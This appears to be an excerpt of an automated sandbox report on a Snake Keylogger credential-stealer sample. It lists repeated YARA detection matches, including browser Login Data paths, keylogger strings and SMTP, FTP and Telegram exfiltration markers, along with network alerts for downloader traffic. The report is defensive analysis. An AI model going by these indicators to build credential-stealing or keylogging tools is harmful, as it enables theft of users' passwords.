2.2.RegSvcs.exe.2ee4ee6.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.2ee4ee6.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.RegSvcs.exe.2ee4ee6.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.2ee4ee6.2.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
2.2.RegSvcs.exe.2ee4ee6.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x250aa:$a1: get_encryptedPassword 0x2507e:$a2: get_encryptedUsername 0x25142:$a3: get_timePasswordChanged 0x2505a:$a4: get_passwordField 0x250c0:$a5: set_encryptedPassword 0x24e8d:$a7: get_logins 0x214f7:$a10: KeyLoggerEventArgs 0x214c6:$a11: KeyLoggerEventArgsEventHandler 0x24f61:$a13: _encryptedPassword
2.2.RegSvcs.exe.2ee4ee6.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x2acca:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x29efb:$a3: \Google\Chrome\User Data\Default\Login Data 0x2a32e:$a4: \Orbitum\User Data\Default\Login Data 0x2b36f:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.2ee4ee6.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2398a:$s1: UnHook 0x23926:$s2: SetHook 0x2395f:$s3: CallNextHook 0x238ee:$s4: _hook
2.2.RegSvcs.exe.2ee4ee6.2.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x28310:$x1: $%SMTPDV$ 0x26cf4:$x2: $#TheHashHere%& 0x282b8:$x3: %FTPDV$ 0x26c94:$x4: $%TelegramDv$ 0x214c6:$x5: KeyLoggerEventArgs 0x214f7:$x5: KeyLoggerEventArgs 0x282dc:$m2: Clipboard Logs ID 0x2851a:$m2: Screenshot Logs ID 0x2862a:$m2: keystroke Logs ID 0x28904:$m3: SnakePW 0x284f2:$m4: \SnakeKeylogger\
2.2.RegSvcs.exe.5650000.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.5650000.6.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.RegSvcs.exe.5650000.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.5650000.6.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
2.2.RegSvcs.exe.5650000.6.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x241c2:$a1: get_encryptedPassword 0x24196:$a2: get_encryptedUsername 0x2425a:$a3: get_timePasswordChanged 0x24172:$a4: get_passwordField 0x241d8:$a5: set_encryptedPassword 0x23fa5:$a7: get_logins 0x2060f:$a10: KeyLoggerEventArgs 0x205de:$a11: KeyLoggerEventArgsEventHandler 0x24079:$a13: _encryptedPassword
2.2.RegSvcs.exe.5650000.6.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x29de2:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x29013:$a3: \Google\Chrome\User Data\Default\Login Data 0x29446:$a4: \Orbitum\User Data\Default\Login Data 0x2a487:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.5650000.6.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x22aa2:$s1: UnHook 0x22a3e:$s2: SetHook 0x22a77:$s3: CallNextHook 0x22a06:$s4: _hook
2.2.RegSvcs.exe.5650000.6.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x27428:$x1: $%SMTPDV$ 0x25e0c:$x2: $#TheHashHere%& 0x273d0:$x3: %FTPDV$ 0x25dac:$x4: $%TelegramDv$ 0x205de:$x5: KeyLoggerEventArgs 0x2060f:$x5: KeyLoggerEventArgs 0x273f4:$m2: Clipboard Logs ID 0x27632:$m2: Screenshot Logs ID 0x27742:$m2: keystroke Logs ID 0x27a1c:$m3: SnakePW 0x2760a:$m4: \SnakeKeylogger\
2.2.RegSvcs.exe.41a9590.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.41a9590.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.RegSvcs.exe.41a9590.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.41a9590.3.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
2.2.RegSvcs.exe.41a9590.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x241c2:$a1: get_encryptedPassword 0x24196:$a2: get_encryptedUsername 0x2425a:$a3: get_timePasswordChanged 0x24172:$a4: get_passwordField 0x241d8:$a5: set_encryptedPassword 0x23fa5:$a7: get_logins 0x2060f:$a10: KeyLoggerEventArgs 0x205de:$a11: KeyLoggerEventArgsEventHandler 0x24079:$a13: _encryptedPassword
2.2.RegSvcs.exe.41a9590.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x29de2:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x29013:$a3: \Google\Chrome\User Data\Default\Login Data 0x29446:$a4: \Orbitum\User Data\Default\Login Data 0x2a487:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.41a9590.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x22aa2:$s1: UnHook 0x22a3e:$s2: SetHook 0x22a77:$s3: CallNextHook 0x22a06:$s4: _hook
2.2.RegSvcs.exe.41a9590.3.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x27428:$x1: $%SMTPDV$ 0x25e0c:$x2: $#TheHashHere%& 0x273d0:$x3: %FTPDV$ 0x25dac:$x4: $%TelegramDv$ 0x205de:$x5: KeyLoggerEventArgs 0x2060f:$x5: KeyLoggerEventArgs 0x273f4:$m2: Clipboard Logs ID 0x27632:$m2: Screenshot Logs ID 0x27742:$m2: keystroke Logs ID 0x27a1c:$m3: SnakePW 0x2760a:$m4: \SnakeKeylogger\
2.2.RegSvcs.exe.5750000.7.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.5750000.7.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.RegSvcs.exe.5750000.7.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.5750000.7.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
2.2.RegSvcs.exe.5750000.7.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x250aa:$a1: get_encryptedPassword 0x2507e:$a2: get_encryptedUsername 0x25142:$a3: get_timePasswordChanged 0x2505a:$a4: get_passwordField 0x250c0:$a5: set_encryptedPassword 0x24e8d:$a7: get_logins 0x214f7:$a10: KeyLoggerEventArgs 0x214c6:$a11: KeyLoggerEventArgsEventHandler 0x24f61:$a13: _encryptedPassword
2.2.RegSvcs.exe.5750000.7.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x2acca:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x29efb:$a3: \Google\Chrome\User Data\Default\Login Data 0x2a32e:$a4: \Orbitum\User Data\Default\Login Data 0x2b36f:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.5750000.7.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2398a:$s1: UnHook 0x23926:$s2: SetHook 0x2395f:$s3: CallNextHook 0x238ee:$s4: _hook
2.2.RegSvcs.exe.5750000.7.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x28310:$x1: $%SMTPDV$ 0x26cf4:$x2: $#TheHashHere%& 0x282b8:$x3: %FTPDV$ 0x26c94:$x4: $%TelegramDv$ 0x214c6:$x5: KeyLoggerEventArgs 0x214f7:$x5: KeyLoggerEventArgs 0x282dc:$m2: Clipboard Logs ID 0x2851a:$m2: Screenshot Logs ID 0x2862a:$m2: keystroke Logs ID 0x28904:$m3: SnakePW 0x284f2:$m4: \SnakeKeylogger\
2.2.RegSvcs.exe.5650000.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.5650000.6.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.5650000.6.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
2.2.RegSvcs.exe.5650000.6.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x223c2:$a1: get_encryptedPassword 0x22396:$a2: get_encryptedUsername 0x2245a:$a3: get_timePasswordChanged 0x22372:$a4: get_passwordField 0x223d8:$a5: set_encryptedPassword 0x221a5:$a7: get_logins 0x1e80f:$a10: KeyLoggerEventArgs 0x1e7de:$a11: KeyLoggerEventArgsEventHandler 0x22279:$a13: _encryptedPassword
2.2.RegSvcs.exe.5650000.6.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x27fe2:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x27213:$a3: \Google\Chrome\User Data\Default\Login Data 0x27646:$a4: \Orbitum\User Data\Default\Login Data 0x28687:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.5650000.6.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x20ca2:$s1: UnHook 0x20c3e:$s2: SetHook 0x20c77:$s3: CallNextHook 0x20c06:$s4: _hook
2.2.RegSvcs.exe.5650000.6.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x25628:$x1: $%SMTPDV$ 0x2400c:$x2: $#TheHashHere%& 0x255d0:$x3: %FTPDV$ 0x23fac:$x4: $%TelegramDv$ 0x1e7de:$x5: KeyLoggerEventArgs 0x1e80f:$x5: KeyLoggerEventArgs 0x255f4:$m2: Clipboard Logs ID 0x25832:$m2: Screenshot Logs ID 0x25942:$m2: keystroke Logs ID 0x25c1c:$m3: SnakePW 0x2580a:$m4: \SnakeKeylogger\
2.2.RegSvcs.exe.5750ee8.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.5750ee8.8.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.RegSvcs.exe.5750ee8.8.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.5750ee8.8.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
2.2.RegSvcs.exe.5750ee8.8.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x241c2:$a1: get_encryptedPassword 0x24196:$a2: get_encryptedUsername 0x2425a:$a3: get_timePasswordChanged 0x24172:$a4: get_passwordField 0x241d8:$a5: set_encryptedPassword 0x23fa5:$a7: get_logins 0x2060f:$a10: KeyLoggerEventArgs 0x205de:$a11: KeyLoggerEventArgsEventHandler 0x24079:$a13: _encryptedPassword
2.2.RegSvcs.exe.5750ee8.8.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x29de2:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x29013:$a3: \Google\Chrome\User Data\Default\Login Data 0x29446:$a4: \Orbitum\User Data\Default\Login Data 0x2a487:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.5750ee8.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x22aa2:$s1: UnHook 0x22a3e:$s2: SetHook 0x22a77:$s3: CallNextHook 0x22a06:$s4: _hook
2.2.RegSvcs.exe.5750ee8.8.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x27428:$x1: $%SMTPDV$ 0x25e0c:$x2: $#TheHashHere%& 0x273d0:$x3: %FTPDV$ 0x25dac:$x4: $%TelegramDv$ 0x205de:$x5: KeyLoggerEventArgs 0x2060f:$x5: KeyLoggerEventArgs 0x273f4:$m2: Clipboard Logs ID 0x27632:$m2: Screenshot Logs ID 0x27742:$m2: keystroke Logs ID 0x27a1c:$m3: SnakePW 0x2760a:$m4: \SnakeKeylogger\
2.2.RegSvcs.exe.4176458.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.4176458.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.RegSvcs.exe.4176458.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.4176458.4.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
2.2.RegSvcs.exe.4176458.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x241c2:$a1: get_encryptedPassword 0x572fa:$a1: get_encryptedPassword 0x24196:$a2: get_encryptedUsername 0x572ce:$a2: get_encryptedUsername 0x2425a:$a3: get_timePasswordChanged 0x57392:$a3: get_timePasswordChanged 0x24172:$a4: get_passwordField 0x572aa:$a4: get_passwordField 0x241d8:$a5: set_encryptedPassword 0x57310:$a5: set_encryptedPassword 0x23fa5:$a7: get_logins 0x570dd:$a7: get_logins 0x2060f:$a10: KeyLoggerEventArgs 0x53747:$a10: KeyLoggerEventArgs 0x205de:$a11: KeyLoggerEventArgsEventHandler 0x53716:$a11: KeyLoggerEventArgsEventHandler 0x24079:$a13: _encryptedPassword 0x571b1:$a13: _encryptedPassword
2.2.RegSvcs.exe.4176458.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x29de2:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x5cf1a:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x29013:$a3: \Google\Chrome\User Data\Default\Login Data 0x5c14b:$a3: \Google\Chrome\User Data\Default\Login Data 0x29446:$a4: \Orbitum\User Data\Default\Login Data 0x5c57e:$a4: \Orbitum\User Data\Default\Login Data 0x2a487:$a5: \Kometa\User Data\Default\Login Data 0x5d5bf:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.4176458.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x22aa2:$s1: UnHook 0x55bda:$s1: UnHook 0x22a3e:$s2: SetHook 0x55b76:$s2: SetHook 0x22a77:$s3: CallNextHook 0x55baf:$s3: CallNextHook 0x22a06:$s4: _hook 0x55b3e:$s4: _hook
2.2.RegSvcs.exe.4176458.4.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x27428:$x1: $%SMTPDV$ 0x5a560:$x1: $%SMTPDV$ 0x25e0c:$x2: $#TheHashHere%& 0x58f44:$x2: $#TheHashHere%& 0x273d0:$x3: %FTPDV$ 0x5a508:$x3: %FTPDV$ 0x25dac:$x4: $%TelegramDv$ 0x58ee4:$x4: $%TelegramDv$ 0x205de:$x5: KeyLoggerEventArgs 0x2060f:$x5: KeyLoggerEventArgs 0x53716:$x5: KeyLoggerEventArgs 0x53747:$x5: KeyLoggerEventArgs 0x273f4:$m2: Clipboard Logs ID 0x27632:$m2: Screenshot Logs ID 0x27742:$m2: keystroke Logs ID 0x5a52c:$m2: Clipboard Logs ID 0x5a76a:$m2: Screenshot Logs ID 0x5a87a:$m2: keystroke Logs ID 0x27a1c:$m3: SnakePW 0x5ab54:$m3: SnakePW 0x2760a:$m4: \SnakeKeylogger\
2.2.RegSvcs.exe.4175570.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.4175570.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.RegSvcs.exe.4175570.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.4175570.5.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
2.2.RegSvcs.exe.4175570.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x250aa:$a1: get_encryptedPassword 0x581e2:$a1: get_encryptedPassword 0x2507e:$a2: get_encryptedUsername 0x581b6:$a2: get_encryptedUsername 0x25142:$a3: get_timePasswordChanged 0x5827a:$a3: get_timePasswordChanged 0x2505a:$a4: get_passwordField 0x58192:$a4: get_passwordField 0x250c0:$a5: set_encryptedPassword 0x581f8:$a5: set_encryptedPassword 0x24e8d:$a7: get_logins 0x57fc5:$a7: get_logins 0x214f7:$a10: KeyLoggerEventArgs 0x5462f:$a10: KeyLoggerEventArgs 0x214c6:$a11: KeyLoggerEventArgsEventHandler 0x545fe:$a11: KeyLoggerEventArgsEventHandler 0x24f61:$a13: _encryptedPassword 0x58099:$a13: _encryptedPassword
2.2.RegSvcs.exe.4175570.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x2acca:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x5de02:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x29efb:$a3: \Google\Chrome\User Data\Default\Login Data 0x5d033:$a3: \Google\Chrome\User Data\Default\Login Data 0x2a32e:$a4: \Orbitum\User Data\Default\Login Data 0x5d466:$a4: \Orbitum\User Data\Default\Login Data 0x2b36f:$a5: \Kometa\User Data\Default\Login Data 0x5e4a7:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.4175570.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2398a:$s1: UnHook 0x56ac2:$s1: UnHook 0x23926:$s2: SetHook 0x56a5e:$s2: SetHook 0x2395f:$s3: CallNextHook 0x56a97:$s3: CallNextHook 0x238ee:$s4: _hook 0x56a26:$s4: _hook
2.2.RegSvcs.exe.4175570.5.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x28310:$x1: $%SMTPDV$ 0x5b448:$x1: $%SMTPDV$ 0x26cf4:$x2: $#TheHashHere%& 0x59e2c:$x2: $#TheHashHere%& 0x282b8:$x3: %FTPDV$ 0x5b3f0:$x3: %FTPDV$ 0x26c94:$x4: $%TelegramDv$ 0x59dcc:$x4: $%TelegramDv$ 0x214c6:$x5: KeyLoggerEventArgs 0x214f7:$x5: KeyLoggerEventArgs 0x545fe:$x5: KeyLoggerEventArgs 0x5462f:$x5: KeyLoggerEventArgs 0x282dc:$m2: Clipboard Logs ID 0x2851a:$m2: Screenshot Logs ID 0x2862a:$m2: keystroke Logs ID 0x5b414:$m2: Clipboard Logs ID 0x5b652:$m2: Screenshot Logs ID 0x5b762:$m2: keystroke Logs ID 0x28904:$m3: SnakePW 0x5ba3c:$m3: SnakePW 0x284f2:$m4: \SnakeKeylogger\
2.2.RegSvcs.exe.2ee5dce.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.2ee5dce.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.2ee5dce.1.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
2.2.RegSvcs.exe.2ee5dce.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x223c2:$a1: get_encryptedPassword 0x22396:$a2: get_encryptedUsername 0x2245a:$a3: get_timePasswordChanged 0x22372:$a4: get_passwordField 0x223d8:$a5: set_encryptedPassword 0x221a5:$a7: get_logins 0x1e80f:$a10: KeyLoggerEventArgs 0x1e7de:$a11: KeyLoggerEventArgsEventHandler 0x22279:$a13: _encryptedPassword
2.2.RegSvcs.exe.2ee5dce.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x27fe2:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x27213:$a3: \Google\Chrome\User Data\Default\Login Data 0x27646:$a4: \Orbitum\User Data\Default\Login Data 0x28687:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.2ee5dce.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x20ca2:$s1: UnHook 0x20c3e:$s2: SetHook 0x20c77:$s3: CallNextHook 0x20c06:$s4: _hook
2.2.RegSvcs.exe.2ee5dce.1.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x25628:$x1: $%SMTPDV$ 0x2400c:$x2: $#TheHashHere%& 0x255d0:$x3: %FTPDV$ 0x23fac:$x4: $%TelegramDv$ 0x1e7de:$x5: KeyLoggerEventArgs 0x1e80f:$x5: KeyLoggerEventArgs 0x255f4:$m2: Clipboard Logs ID 0x25832:$m2: Screenshot Logs ID 0x25942:$m2: keystroke Logs ID 0x25c1c:$m3: SnakePW 0x2580a:$m4: \SnakeKeylogger\
2.2.RegSvcs.exe.5750ee8.8.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.5750ee8.8.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.5750ee8.8.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
2.2.RegSvcs.exe.5750ee8.8.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x223c2:$a1: get_encryptedPassword 0x22396:$a2: get_encryptedUsername 0x2245a:$a3: get_timePasswordChanged 0x22372:$a4: get_passwordField 0x223d8:$a5: set_encryptedPassword 0x221a5:$a7: get_logins 0x1e80f:$a10: KeyLoggerEventArgs 0x1e7de:$a11: KeyLoggerEventArgsEventHandler 0x22279:$a13: _encryptedPassword
2.2.RegSvcs.exe.5750ee8.8.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x27fe2:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x27213:$a3: \Google\Chrome\User Data\Default\Login Data 0x27646:$a4: \Orbitum\User Data\Default\Login Data 0x28687:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.5750ee8.8.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x20ca2:$s1: UnHook 0x20c3e:$s2: SetHook 0x20c77:$s3: CallNextHook 0x20c06:$s4: _hook
2.2.RegSvcs.exe.5750ee8.8.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x25628:$x1: $%SMTPDV$ 0x2400c:$x2: $#TheHashHere%& 0x255d0:$x3: %FTPDV$ 0x23fac:$x4: $%TelegramDv$ 0x1e7de:$x5: KeyLoggerEventArgs 0x1e80f:$x5: KeyLoggerEventArgs 0x255f4:$m2: Clipboard Logs ID 0x25832:$m2: Screenshot Logs ID 0x25942:$m2: keystroke Logs ID 0x25c1c:$m3: SnakePW 0x2580a:$m4: \SnakeKeylogger\
2.2.RegSvcs.exe.41a9590.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.41a9590.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.41a9590.3.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
2.2.RegSvcs.exe.41a9590.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x223c2:$a1: get_encryptedPassword 0x22396:$a2: get_encryptedUsername 0x2245a:$a3: get_timePasswordChanged 0x22372:$a4: get_passwordField 0x223d8:$a5: set_encryptedPassword 0x221a5:$a7: get_logins 0x1e80f:$a10: KeyLoggerEventArgs 0x1e7de:$a11: KeyLoggerEventArgsEventHandler 0x22279:$a13: _encryptedPassword
2.2.RegSvcs.exe.41a9590.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x27fe2:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x27213:$a3: \Google\Chrome\User Data\Default\Login Data 0x27646:$a4: \Orbitum\User Data\Default\Login Data 0x28687:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.41a9590.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x20ca2:$s1: UnHook 0x20c3e:$s2: SetHook 0x20c77:$s3: CallNextHook 0x20c06:$s4: _hook
2.2.RegSvcs.exe.41a9590.3.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x25628:$x1: $%SMTPDV$ 0x2400c:$x2: $#TheHashHere%& 0x255d0:$x3: %FTPDV$ 0x23fac:$x4: $%TelegramDv$ 0x1e7de:$x5: KeyLoggerEventArgs 0x1e80f:$x5: KeyLoggerEventArgs 0x255f4:$m2: Clipboard Logs ID 0x25832:$m2: Screenshot Logs ID 0x25942:$m2: keystroke Logs ID 0x25c1c:$m3: SnakePW 0x2580a:$m4: \SnakeKeylogger\
2.2.RegSvcs.exe.2ee5dce.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.RegSvcs.exe.2ee5dce.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.RegSvcs.exe.2ee5dce.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.RegSvcs.exe.2ee5dce.1.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
2.2.RegSvcs.exe.2ee5dce.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x241c2:$a1: get_encryptedPassword 0x24196:$a2: get_encryptedUsername 0x2425a:$a3: get_timePasswordChanged 0x24172:$a4: get_passwordField 0x241d8:$a5: set_encryptedPassword 0x23fa5:$a7: get_logins 0x2060f:$a10: KeyLoggerEventArgs 0x205de:$a11: KeyLoggerEventArgsEventHandler 0x24079:$a13: _encryptedPassword
2.2.RegSvcs.exe.2ee5dce.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x29de2:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x29013:$a3: \Google\Chrome\User Data\Default\Login Data 0x29446:$a4: \Orbitum\User Data\Default\Login Data 0x2a487:$a5: \Kometa\User Data\Default\Login Data
2.2.RegSvcs.exe.2ee5dce.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x22aa2:$s1: UnHook 0x22a3e:$s2: SetHook 0x22a77:$s3: CallNextHook 0x22a06:$s4: _hook
2.2.RegSvcs.exe.2ee5dce.1.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x27428:$x1: $%SMTPDV$ 0x25e0c:$x2: $#TheHashHere%& 0x273d0:$x3: %FTPDV$ 0x25dac:$x4: $%TelegramDv$ 0x205de:$x5: KeyLoggerEventArgs 0x2060f:$x5: KeyLoggerEventArgs 0x273f4:$m2: Clipboard Logs ID 0x27632:$m2: Screenshot Logs ID 0x27742:$m2: keystroke Logs ID 0x27a1c:$m3: SnakePW 0x2760a:$m4: \SnakeKeylogger\
Click to see the 118 entries

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T07:47:13.206173+0100	2803305	3	Unknown Traffic	192.168.2.5	49706	104.21.67.152	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-22T07:47:07.003618+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49704	193.122.130.0	80	TCP
2024-11-22T07:47:08.412852+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49704	193.122.130.0	80	TCP
2024-11-22T07:47:11.537970+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49704	193.122.130.0	80	TCP
2024-11-22T07:47:15.522259+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49707	193.122.130.0	80	TCP
2024-11-22T07:47:19.115995+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49709	193.122.130.0	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000002.00000002.4555400632.0000000005750000.00000004.08000000.00040000.00000000.sdmp

